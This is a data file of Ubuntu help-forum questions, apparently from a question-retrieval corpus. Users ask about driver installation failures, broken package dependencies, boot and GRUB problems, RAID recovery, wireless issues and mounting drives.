240132	locked out after using usermod	after trying to change my password with usermod -p < new password > < username > ( which seemed to work but did n't give any messages ) i found i could not log in using either my old or new password . from what i 've read it looks like maybe this is due to usermod expecting the password given to be encrypted ? how can i get back in ?
240136	in xbmc , `` ok '' , `` vol +/- '' and `` back '' buttons not working	i have an asus s1-at5nm10e htpc which has an integrated ir receiver . on ubuntu 12.04 , i have installed xbmc , but when i press `` ok '' , `` vol +/- '' or `` back '' on my mce remote ( in fact , a logitech harmony 300i configured to emulate an mce remote ) , xbmc does n't seem to detect the signals . however , arrow buttons do work well . i know that the faulty buttons are detected by the computer because , when i run cat /dev/lirc0 , a bunch of weird characters are displayed each time i press one of them . the ir receiver is also able to detect a completely different remote ( tv ) because another family of characters were displayed . i have installed lirc ( sudo apt-get install lirc ) to see the output of irw . unfortunately , irw did n't output anything . thanks to ir-keytable , i could determinate the integrated ir receiver is from nuvoton : $ ir-keytable found /sys/class/rc/rc0/ ( /dev/input/event4 ) with : driver nuvoton-cir , table rc-rc6-mce supported protocols : nec rc-5 rc-6 jvc sony lirc other enabled protocols : lirc extra capabilities : < access denied > why are some buttons not working ? how can i make them work ?
240139	compiled and installed compat wireless . how do i remove it	i tried to compile and install manually a new version of compat wireless on my ubuntu 12.10 , because i had a bit wifi problems . the problems are n't gone but now my internal wifi card ( atheros ar9485 ) doese n't show ( tried modprobe ath9k , no success ) , and i want to get back to like things was before . used checkinstall and have tried dpkg -r compat-wireless but when i reeboot after the uninstall then i get no visible wifi connections ( i have an usb dongle which uses rt2800 driver too which doesent show ) .
240142	to convert a windows machine to ubuntu , can i just boot the cd and install ?	rather than reinstall windows i thought i would use my older machine to come up to speed on ubuntu and dedicate the machine to that . i have another windows machine operating do i just download ubuntu , save and burn to a cd and install from that on to the machine which has lost the ability to boot currently ?
240147	libglib2.0-0 broken	i accidentally broke libbglib2.0-0 by trying to install a newer debian package version . now i ca n't do anything . here is what i did : sudo dpkg -i libglib*.deb ( reading database ... 503232 files and directories currently installed . ) preparing to replace libglib2.0-0 2.30.0-0ubuntu4 ( using libglib2.0-0_2.33.12+really2.32.4-5_amd64.deb ) ... de-configuring libglib2.0-0 : i386 ... unpacking replacement libglib2.0-0 ... dpkg : error processing libglib2.0-0 ( -- install ) : libglib2.0-0 : amd64 2.33.12+really2.32.4-5 can not be configured because libglib2.0-0 : i386 is in a different version ( 2.30.0-0ubuntu4 ) dpkg : error processing libglib2.0-0 : i386 ( -- install ) : libglib2.0-0 : i386 2.30.0-0ubuntu4 can not be configured because libglib2.0-0 : amd64 is in a different version ( 2.33.12+really2.32.4-5 ) errors were encountered while processing : libglib2.0-0 libglib2.0-0 : i386 -- sudo apt-get -f install readingpackage lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libglib2.0-0 : depends : libffi5 ( > = 3.0.4 ) but it is not installable breaks : libglib2.0-0 : i386 ( ! = 2.33.12+really2.32.4-5 ) but 2.30.0-0ubuntu4 is installed libglib2.0-0 : i386 : breaks : libglib2.0-0 ( ! = 2.30.0-0ubuntu4 ) but 2.33.12+really2.32.4-5 is installed libglib2.0-bin : depends : libglib2.0-0 ( = 2.30.0-0ubuntu4 ) but 2.33.12+really2.32.4-5 is installed libglib2.0-dev : depends : libglib2.0-0 ( = 2.30.0-0ubuntu4 ) but 2.33.12+really2.32.4-5 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies -- sudo apt-get install libglib2.0-0 reading package lists ... done building dependency tree reading state information ... done libglib2.0-0 is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libglib2.0-0 : depends : libffi5 ( > = 3.0.4 ) but it is not installable breaks : libglib2.0-0 : i386 ( ! = 2.33.12+really2.32.4-5 ) but 2.30.0-0ubuntu4 is to be installed libglib2.0-0 : i386 : breaks : libglib2.0-0 ( ! = 2.30.0-0ubuntu4 ) but 2.33.12+really2.32.4-5 is to be installed libglib2.0-bin : depends : libglib2.0-0 ( = 2.30.0-0ubuntu4 ) but 2.33.12+really2.32.4-5 is to be installed libglib2.0-dev : depends : libglib2.0-0 ( = 2.30.0-0ubuntu4 ) but 2.33.12+really2.32.4-5 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . what do i do ? pretty much everything depends on glib . edit : i tried what the first commenter said and got this result : sudo apt-get install -f libglib2.0-0=2.30.0-0ubuntu4 reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libpanel-applet-4-0 use 'apt-get autoremove ' to remove them . the following packages will be downgraded : libglib2.0-0 0 upgraded , 0 newly installed , 1 downgraded , 0 to remove and 1 not upgraded . 3 not fully installed or removed . need to get 0 b/1,169 kb of archives . after this operation , 265 kb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : warning : downgrading libglib2.0-0 from 2.33.12+really2.32.4-5 to 2.30.0-0ubuntu4 . ( reading database ... 503237 files and directories currently installed . ) preparing to replace libglib2.0-0 2.33.12+really2.32.4-5 ( using ... /libglib2.0-0_2.30.0-0ubuntu4_amd64.deb ) ... unpacking replacement libglib2.0-0 ... dpkg : error processing /var/cache/apt/archives/libglib2.0-0_2.30.0-0ubuntu4_amd64.deb ( -- unpack ) : './usr/share/doc/libglib2.0-0/readme.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libglib2.0-0_2.30.0-0ubuntu4_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
240148	raid 0 , new drive mirroring issues	here 's the run down : we have a 2 disk raid 0 array . one of the drives failed and the other is marked as depreciating . we aquired a new drive , same specs as the old . to our thinking we simply replaced the old drive with the new drive and theh raid should have taken care of the mirroring all on its own . well , it did not . now we are trying to figure out a way to make the new disk a mirrored disk and i had a thought that if we simply copy the whole drive exactly like the other one and put it back into the raid card we should be good to go . well , its not that simple , most copy programs do n't do raid 0 and i do n't really trust a whole bunch of non-tested tried and true programs . i decided to try out ubuntu livecd and dd . i understand how to use dd when we get names like /dev/sda and /dev/sdb , ... the drives , when i do sudo lshw -c disk show up as unclaimed and they have no nifty little name that would have made this so much simpler . any suggestions on getting this raid array back up and running . we basically have one shot at this , as the other drive is the only copy of the server .
240149	why does my custom shortcut reappear unexpectedly ?	i created a custom shortcut ctrl+alt+t that calls x-terminal-emulator . for some reason , it does not work ( nothing happens when hitting the mapping ) . when i remove the shortcut , the built-in launch terminal shortcut ( which is also set to the same mapping ) opens the terminal window as expected . the problem is when i restart my session after deleting the shortcut , it is recreated in the custom shortcut window . do you have any idea why this shortcut is always recreated automatically after restarting a session ? do you have any idea how to fix this ? i ca n't find a configuration file in my home that contains the x-terminal-emulator string . i am running 12.04 desktop .
240155	brightness not working acer aspire one 756-2623	brightness not working acer aspire one 756-2623 with ubuntu 12.04 . also the mousepad right-click is n't working ether . i 'm completely new to ubuntu and linux in general . how do i fix it ?
240156	ubuntu fails to load after installing fglrx	i am using a toshiba satellite notebook with xubuntu 12.10 x86_64 . just now , i installed the fglrx package to be able to use the propriety drivers for my graphics card . however , once i rebooted after installing the package , xubuntu fails to load . the loading screen ( xubuntu logo ; left-right moving bar ) appears for a few seconds before the screen turns black and a log of a bunch of daemons starting appears . i press alt + f4 to log in to a terminal , but when i try starting xubuntu by running startx , i get this error at the end : ... loading extension glx ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 0:1:1 ) found setvbemode failed fatal server error : no screens found ( ee ) please consult the x.org foundation support at http : //wiki.x.org for help . server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error i am stumped and i do n't know what to do to solve this issue , and still be able to use the proprietary drivers . if it helps , i found this : $ sudo aticonfig -- list-adapters * 0.00:01.0 amd radeon hd 7310 graphics can anyone help me solve the issue ? thanks . edit : here is my /var/log/xorg.0.log : http : //ompldr.org/vadfnbw edit2 : i can manage to start x without the driver by disabling it ( sudo jockey-text -d kmod : fglrx ) but i still want to solve the issue and be able to use the proprietary drivers .
240160	can ubuntu server 10.04.4 lts be upgraded to non-lts ?	i have a server running ubuntu 10.04.4 lts . can i upgrade this distribution to precise lts , then from there , convert to non-lts releases ?
240163	12.10 blank boot screen after installing over windows 7	so i am a first time linux user , and wanted to install ubuntu 12.10 on my laptop that was previously running windows 7 . i made a live usb drive to try it out , and then used it to go through the installation . ( i wiped my old w7 install and replaced it with u12.10 . ) everything completed fine , but now after my bios screen there 's a blinking cursor for about 4 seconds and then nothing . just a blank screen indefinitely . what am i doing wrong ?
240166	hard disk clicks	i have ubuntu 12.04 lts installed on dell vostro laptop . the device has also windows 7 and i set it as dual boot . recently , i found that when i put the laptop to sleep , the hard disk refused to resume and there are serious clicks . now , i hear these clicks when the laptop is booting and it refused to boot . i shut it down and try many times until it boots . once the device is working , i do n't hear any clicks . please help dina
240171	ca n't get audio cd extractor to open when i insert a cd	when i insert a cd i want audio cd extractor to open . right now banshee opens . i 've gone to system settings , removable media and i have chosen audio cd extractor for how cd audio media should be handled to no effect . i 'm running ubuntu 11.10 . thank you for your help .
240175	ubuntu 12.04 installation hangs after displaying the world map	i was trying to install ubuntu 12.04 on the lab machines and the installation process hangs after displaying the world map to select the time zone . this happens with both 32 and 64 bits versions . any idea ?
240176	mapping microsoft mobile mouse 4000 back / thumb button	i ca n't seem to find how to map the thumb ( back ) button on my microsoft mobile mouse 4000 . everything else i need on it works , but when i run xev it does n't register the thumb button . for reference , it also does n't register the wheel tilt buttons , but i do n't use those so no need to map them . it seems odd to me that on windows on the same computer all the buttons work yet xev on my ubuntu 12.10 vm does n't capture those three .
240179	two different dns on router and pc ?	my default dns on my router is set to dyndns . if i set the router as default dns on my pc , it would use dyndns as the dns . then what if i set google public dns as dns on my pc , and dyndns on my router , which dns will it use ?
240182	how to fix `` e : malformed line 62 in source list /etc/apt/sources.list ( dist parse ) '' ?	i recently updated to xubuntu 12.10 from an older suite . i followed instructions i found in other postings . cat -n /etc/apt/sources.list | grep 62 62 deb http : //ppa.launchpad.net/jonabeck/ppa/xubuntu main then edited the file : sudo gedit /etc/apt/source.list the source list opened and the document was blank . i 'm wondering how i got here and if there is anything to do besides load a new source list . any help is appreciated . please keep in mind that i 'm very new to ubuntu .
240184	amd catalyst driver installer failing at dkms	i am following these instructions to install the fglrx drivers . when i am running sudo sh amd-driver-12-6-x86_64.run it tells me fglrx is already installed ; even though i ran the commands to remove it . so i added the -- force option anyway and went through the installer ; here is the output : created directory fglrx-install.runxwa verifying archive integrity ... all good . uncompressing amd catalyst ( tm ) proprietary driver-8.98 ... ===================================================================== amd catalyst ( tm ) proprietary driver installer/packager ===================================================================== detected configuration : architecture : x86_64 ( 64-bit ) x server : x.org 6.9 or later 64-bit loki_setup : directory : ( null ) dkms part of installation failed . please refer to /usr/share/ati/fglrx-install.log for details removing temporary directory : fglrx-install.runxwa and here is /usr/share/ati/fglrx-install.log : check if system has the tools required for installation . fglrx installation is being forced . installation will proceed without the required tools on the system . uninstalling any previously installed drivers . creating symlink /var/lib/dkms/fglrx/8.98/source - > /usr/src/fglrx-8.98 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . cd /var/lib/dkms/fglrx/8.98/build ; sh make.sh -- nohints -- uname_r=3.5.0-21-generic -- norootcheck ... . ( bad exit status : 1 ) [ error ] kernel module : failed to build fglrx-8.98 with dkms [ error ] kernel module : removing fglrx-8.98 from dkms -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 8.98 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . no idea why this is failing , and i have the dkms and linux-headers-3.5.0-21-generic packages installed just in case . does anyone know the cause of this ? installation procedure : http : //ompldr.org/vadj3aw x error log with fglrx installed : http : //ompldr.org/vadj3ba x error log without fglrx installed : http : //ompldr.org/vadj3bq
240185	is openjdk vulnerable to 0-day exploit ?	i was curious to know if openjdk is also vulnerable to the zero-day exploit that is currently afflicting java 7 because of which experts are telling people to disable java until a solution is found on all operating systems .
240191	installing ms office in ubuntu without cd-rom	i wanted to install ms office in ubuntu 12.04.1 lts . i installed playonlinux and try to follow the office 2007 installation . but it is asking cd rom as the source whereas what i have is only setup file in my computer . in this case , how can i install it ? anyone knows ?
240192	are we affected by the java vulnerability ? are all `` applets '' affected ?	i read today that the department of homeland security has warned against java-run systems and requested users to disable/uninstall java itself . my questions : are we in trouble ? what about all those applets for network manager and the other stuff on the top right side of our screens ? will they vanish if i remove java ? i ask because we call them applets so i presume they 're done in java . also , how do i know which java is on my computer ?
240197	how can i have windows 7 in virtualbox recognise usb devices ?	recently i installed windows in ubuntu 12.04.1 lts using virtualbox . i want to know how to access external hard disks or usbs in the virtual windows 7 . when i plug in external storage device , only ubuntu is detecting it . but the virtual windows 7 is unable to detect it and i ca n't access it from windows 7 . how can i link the files between ubuntu and parallel windows so that files can be shared in each os at the same time ?
240208	preinstalled windows 8 not showing up on grub 2 , ubuntu 12.10	http : //paste.ubuntu.com/1522276/ hi there , i 've scoured everywhere & i 'm still all very confused . since i 'm a total noob , i do n't really want to touch too many files ... i have an acer m5 with windows 8 preinstalled . i installed ubuntu 12.10 in secure boot , but grub does not recognize my windows 8 . i tried boot-repair , to no avail . here are my specs : http : //paste.ubuntu.com/1522276/ please help ?
240209	how to mount an external hard drive as root ?	i recently changed my external hard drive so that it can be read/edited by all , not just myself . in doing so i think i made it so only the root user can mount it . when i tried to mount it today i got this message : error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdb1 on /media/sdb1 what steps do i need to take to mount it , whether it be in the terminal or not ? thanks ! !
240219	ca n't access other drives	my 500 gb hard drive with windows 7 has recently crashed with all my personal files on it . i have called hp and have a new hdd in the mail but i am unable to remove old files from the old hdd . i am a pretty good with computers and have put ubuntu on a flash drive in the hopes of accessing my files and moving them to an external hdd . but i have run into an error `` adding read acl for uid 1000 to ' /media/username ' failed : operation not supported . '' i have read several pages on the same problem but i am new to ubuntu and can not figure out what to do . please help .
240230	can i put my windows xp installation on a disk for later use ?	i intend to learn linux in-depth and i 'd like to start with a `` clean '' machine ( microsoft free ) . i just need to know if i can put my factory installed windows xp on disc for later use ( spare parts build etc . ) since my ubuntu linux experience will be learning/hobbyist rather than just trying to make stuff work .
240234	how do i get an atheros ar9485 wireless card working ?	recently i updated my 12.10 ubuntu , ever since i got this strange wifi internet problem . net works fine on the initial boot , after couple of web requests from a browser or command line or any tool , internet stopped working . i have to disconnect & connect the wifi to get it work again . it happens every few minutes . its frustrating . it was working fine before the upgrade . i am sure this is not the machine problem , because my dual boot win 8 works fine . i tried iwconfig , this is the output lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' jumbotron '' mode : managed frequency:2.437 ghz access point : 08:86:3b:8c : c0:74 bit rate=150 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=50/70 signal level=-60 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:1 invalid misc:2 missed beacon:0 anybody know whats goin on ? update : i connected my android phone in wlan and enabled usb tethering with ubuntu machine . it works great . so the problem is defenitly with wireless configuration or drivers these are some configs i got lshw -c network *-network description : wireless interface product : ar9485 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:08 : ca : e6:6b:59 width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-23-generic-pae firmware=n/a ip=192.168.2.11 latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : dea00000-dea7ffff memory : dea80000-dea8ffff ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1727 errors:0 dropped:0 overruns:0 frame:0 tx packets:1727 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:137632 ( 137.6 kb ) tx bytes:137632 ( 137.6 kb ) wlan0 link encap : ethernet hwaddr 00:08 : ca : e6:6b:59 inet addr:192.168.2.11 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :208 : caff : fee6:6b59/64 scope : link up broadcast multicast mtu:1400 metric:1 rx packets:12133 errors:0 dropped:0 overruns:0 frame:0 tx packets:11872 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9352562 ( 9.3 mb ) tx bytes:1851594 ( 1.8 mb ) nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ jumbotron ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : ath9k state : connected default : yes hw address : 00:08 : ca : e6:6b:59 capabilities : speed : 150 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *jumbotron : infra , 08:86:3b:8c : c0:74 , freq 2437 mhz , rate 54 mb/s , strength 57 wpa wpa2 ipv4 settings : address : 192.168.2.11 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.2.1 dns : 192.168.2.1
240235	identical `` cores '' in /proc/cpuinfo	an opteron 6128 shows up as follows in /proc/cpuinfo : $ cat /proc/cpuinfo | grep -e ^core -e ^phys physical id : 0 core id : 0 physical id : 0 core id : 1 physical id : 0 core id : 2 physical id : 0 core id : 3 physical id : 0 core id : 0 physical id : 0 core id : 1 physical id : 0 core id : 2 physical id : 0 core id : 3 ... ( other physical id 's ) my understanding so far has been that different cores within the same physical cpu would have different core id , and if core ids are identical , this is due to hyperthreading . so one should interpret this /proc/cpuinfo entry as a 4-core cpu with hyperthreading . however , opteron 6128 is really 8-core . what 's going on here ? p.s . full entry for the 8th `` processor '' : processor : 7 vendor_id : authenticamd cpu family : 16 model : 9 model name : amd opteron ( tm ) processor 6128 stepping : 1 cpu mhz : 800.000 cache size : 512 kb physical id : 0 siblings : 8 core id : 3 cpu cores : 8 apicid : 23 initial apicid : 7 fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc rep_good nonstop_tsc extd_apicid amd_dcm pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt nodeid_msr npt lbrv svm_lock nrip_save pausefilter bogomips : 3999.89 tlb size : 1024 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm stc 100mhzsteps hwpstate
240238	how to install qtquick 2.0 and ubuntu components 0.1 ?	i am facing this problem while making a currency converter program in qt creator . the program is as follows : import qtquick 2.0 import ubuntu.components 0.1 rectangle { id : root width : units.gu ( 60 ) height : units.gu ( 80 ) color : `` lightgray '' property real margins : units.gu ( 2 ) property real buttonwidth : units.gu ( 9 ) label { id : title itemstyle.class : `` title '' text : i18n.tr ( `` currency converter '' ) height : contentheight + root.margins anchors { left : parent.left right : parent.right top : parent.top } } } and error says : starting /usr/bin/qmlviewer -i /usr/lib/qt4/imports /home/shri/currencyconverter/currencyconverter.qml qml debugging is enabled . only use this in a safe environment ! file : ///home/shri/currencyconverter/currencyconverter.qml:1:1 : module `` qtquick '' version 2.0 is not installed import qtquick 2.0 ^
240242	latest two images will not install on nexus7 ( 32gb + 3g ) , but older were ok	the latest two ( newest ) daily images will not install on my nexus 7 , 32gb + 3g . the older versions work fine . background looks like coloured snow . ( i can not post the screenshot . ) there is no on-screen keyboard visible . so i can not enter anything [ like user ] name , password ..
240244	how to get thumbnails for hi10p videos ?	does anybody know how get thumbnails for hi10p videos ? i 've tried installing the most recent versions of vlc and ffmpeg but neither work for this purpose . solution i managed to find the answers in a german forum ! in /usr/share/thumbnailers/totem.thumbnailer i replaced : tryexec=/usr/bin/totem-video-thumbnailer exec=/usr/bin/totem-video-thumbnailer -s % s % u % o for : tryexec=/usr/bin/ffmpegthumbnailer exec=/usr/bin/ffmpegthumbnailer -s % s -i % i -o % o -c png -f -t 10
240247	how to prevent ubuntu from assembling degraded raid on boot ?	i have raid 5 on 3 hard disks , in which one of them is external on usb 3 . i 'm facing problems on boot because sometimes the external drive is n't detected or maybe is n't ready soon enough , and the raid starts in degraded mode . its usable after startup but in degraded mode . sometimes ubuntu gets stuck on busybox and i have to exit for it to continue booting . after boot when i check the mdstat file it says the drive is missing . then i manually add the drive using mdadm -- manage -- add command and then it starts reconstructing the array putting load on my cpu . is there a way i can prevent ubuntu from assembling the array when its not able to detect drive in the raid ?
240251	how to mount / after running `` apt-get remove php5-curl '' ?	while trying to tear down a drupal dev environment , i ran sudo apt-get remove php5-curl it started removing all kinds of packages , like the browser , among other things . i hit ctrl+c when i saw what it was doing but the damage was done i guess , because now it hangs at boot . i get `` the disk drive at [ wherever ] is not ready or not present '' where [ wherever ] is various drives starting with the crypt swap , but also including / in recovery mode . it says to press s to skip mounting or m to recover manually , but neither gets a response . if i wait a really long time it progresses to a screen that says only , checking battery state ... ok. then it hangs there . what have i done ? how do i fix it ? upon trying to run a bootable 11.10 ubuntu disk and trying to recover or repair the following errors started streaming from the machine : a memtest revealed the following : does this mean the memory was bad all along ? did i somehow damage my ram by removing packages ? is that even possible ?
240252	sudo : /var/lib/sudo/navneet writable by non-owner ( 040777 ) , should be mode 0700	this error occurs whenever i try to work with sudo . i changed the permissions of /var/ folder to 777 and i think this causes the error . please help me get back a functional sudo and /var .
240255	what is use of gcc flag -wall	can some one help me to understand the use of -wall flag in gcc ? i am working on make file and not able to understand this flag . thanks , vivek
240256	python-problem-report python-apport apport break apt-get	i can no longer install or upgrade packages with apt-get since the packages python-problem-report , python-apport and apport seem to cause some problems . any apt-get command i have tried results in the following error message : preparing to replace python-problem-report 2.0.1-0ubuntu15.1 ( using ... /python-problem-report_2.0.1-0ubuntu15.1_all.deb ) ... file `` /usr/bin/pyclean '' , line 64 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... file `` /usr/bin/pyclean '' , line 64 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : error processing /var/cache/apt/archives/python-problem-report_2.0.1-0ubuntu15.1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 36 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named configparser dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace python-apport 2.0.1-0ubuntu15.1 ( using ... /python-apport_2.0.1-0ubuntu15.1_all.deb ) ... file `` /usr/bin/pyclean '' , line 64 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... file `` /usr/bin/pyclean '' , line 64 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : error processing /var/cache/apt/archives/python-apport_2.0.1-0ubuntu15.1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 36 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named configparser dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 preparing to replace apport 2.0.1-0ubuntu15.1 ( using ... /apport_2.0.1-0ubuntu15.1_all.deb ) ... apport stop/waiting file `` /usr/bin/pyclean '' , line 64 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... file `` /usr/bin/pyclean '' , line 64 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : error processing /var/cache/apt/archives/apport_2.0.1-0ubuntu15.1_all.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 apport start/running traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 36 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named configparser dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/python-problem-report_2.0.1-0ubuntu15.1_all.deb /var/cache/apt/archives/python-apport_2.0.1-0ubuntu15.1_all.deb /var/cache/apt/archives/apport_2.0.1-0ubuntu15.1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this happens even if i try to install packages that have nothing to do with the 3 trouble-making packages . i also selected `` lock at current version '' in muon for these 3 packages , but the same error still occurs . any help would be greatly appreciated .
240257	ubuntu 12.10 loops with usb error 71 when booting	i am using ubuntu 12.10 with an asus motherboard . i was able to install the operating system with no problems . however when i boot the server it keeps looping with usb error 71 even though i have n't plugged any usb devices in to the machine . i used a live cd to install the operating system . the errors keep scrolling up the screen making it hard to see the other prompts . however i can remote in to the machine and not see the errors and do what ever i need to do with the system . is there anyway of preventing these errors from displaying on the screen ? i am not interested in plugging any usb devices in to the machine since it is going to be housed in a data center . thanks .
240259	how can i install wubi with more than 30 gb ?	i want to install ubuntu 12.10 alongside windows 8 with wubi . can i somehow install ubuntu ( wubi ) with more than 30 gb of space ? i have a hp pavilion g7 1303 ( x64 ) .
240261	ca n't load grub all of a sudden ( uefi problem )	so , the last time i used my ubuntu installation was last night . today , as i booted it up , it told me that booting grubx64.efi is not allowed . easy enough . i know how to re-enable it from my bios . after re-enabling it , i try booting again and get the following error : error : secure boot forbids loading module from ( hd0 , gpt7 ) /boot/grub/normal.mod and then there 's this some kind of 'grub resuce ' cl prompt below that error . never figured it out except that ls is a valid command . using ls displays various ( hdx , * ) files/directories/drives . note that , as i never got to load windows 8 from grub despite various tutorials , i use refind to switch between loading grub ( which , in turn , i use to load ubuntu ) and windows 8 . how do i re-enable grub ( and get to ubuntu ) and does anyone know what just caused this problem ? i remember installing ubuntu updates last night but i ca n't remember if there was anything that might relate to something uefi-specific .
240263	glitching and delayed output when recording pulseaudio loopback	i try to make a screencast where i need to record both microphone and pc output sound ( and video of course ) . i tried to make a loopback in pulseaudio to `` merge '' them and using this sink with the recording tool ( first i tried recordmydesktop then ffmpeg/avconv ) . but the issue is when i use this loopback , the sound is glitching ( i think this is the better word describing it ) and have progressive delay ( meaning a lot lot delay after 2/3 minutes ) . this is not happening when using direct output ( mic or pc output ) . i tried to reduce the delay of the loopback to 1ms , did n't change anything ( it did n't want 0ms ) is there any way i can resolve this . i hear about realtime pulseaudio but i think this is a kind a cpu eater ? ( and we need a rt kernel wich i think i do n't have ) i also try to install jackd but without great success ( and apparently it 's a pain in the ass to make it working with avconv ) .
240266	installed from iso	i installed ubuntu 12.10 from an iso disk . it partitioned 6gig and proceeded to install in conjuction with a prexisting version of win7 . install was successful however i can not get it to boot ubuntu . please help . regards , jt
240277	how to see the intermediate code on compilation of a c program ?	i want to see the intermediate code generated during the compilation of a c program . using the -s flag , the object code is generated but is there anything to see the .i files , called as intermediate code .
240278	multitouch gestures in 12.10 : disabling four-finger-swipe + re-configuring generally	https : //wiki.ubuntu.com/multitouch describes a set of default `` supported gestures '' that come with ubuntu 12.10 -- and they work as described on my macbook pro 13 '' retina . but i ca n't figure out how to configure them . i 'm especially tripped up by the `` 4 finger swipe left/right to reveal launcher ( if the dock autohide is enabled ) '' , which apparently has the ability to turn off launcher auto-hide and occlude windows . i 'm also interested in configuring new gestures and/or remapping old ones . i 'd appreciate any advice about : disabling default multitouch gestures changing or creating new multitouch gestures thanks ! please note that the following issues do not answer my question : how can i disable the multitouch gestures in ubuntu ? ( i actually like the `` drag handles '' setting ) how to edit unity multitouch gestures ? ( does not address diabling )
240280	sd card not automatically mounted	this is happening on both ubuntu 12.04 and lubuntu 12.04 ( the latter after i got frustrated to the point of formatting and reinstalling ) . i have an asus eee with a built in sd card slot . i used to use an 8gb card for storage with no problems , but recently upgraded to a 32gb card . when i insert the card , nothing happens . it is not automatically mounted like the 8gb one was . when i type in sudo fdisk -l , the information for /dev/sda appears immediately , but the computer then pauses several minutes before giving the information about /dev/sdb ( which is the sd card slot ) . i have to manually mount the card via sudo mount /dev/sdb1 /media/sigma . this takes even longer than fdisk ; up to ten minutes . the drive is then mounted and accessible , but does not appear in the places section of the lubuntu file manager . i do n't know very much about diagnostics . is there any way to tell whether the new sd card is damaged ? alternatively , can you suggest how to work out what is going wrong and how to fix it ? edit : should point out that the sd card mounted with no problems on windows 7 . edit2 : the output from sudo blkid was : /dev/sdb1 : label= '' sigma '' uuid= '' 148acd4f8acd2e54 '' type= '' ntfs '' edit3 : see my comment to fabricator4 's answer below . i added the sd card to the fstab file with the following line . the card now mounts automatically on boot , however it still takes a very long time for this to mount , which means booting the computer now takes several minutes longer than it used to . have you got any idea what may be causing it to take so long ? /dev/sdb1 /media/sigma ntfs nls=utf8 , umask=000 , uid=1000 , gid=1000 0 0
240284	how to run ctags ?	i 've installed exuberant-ctags package , but when i run ctags , etags or exuberant-ctags , i always get command not found . where can i find executable file to run exuberant-ctags ?
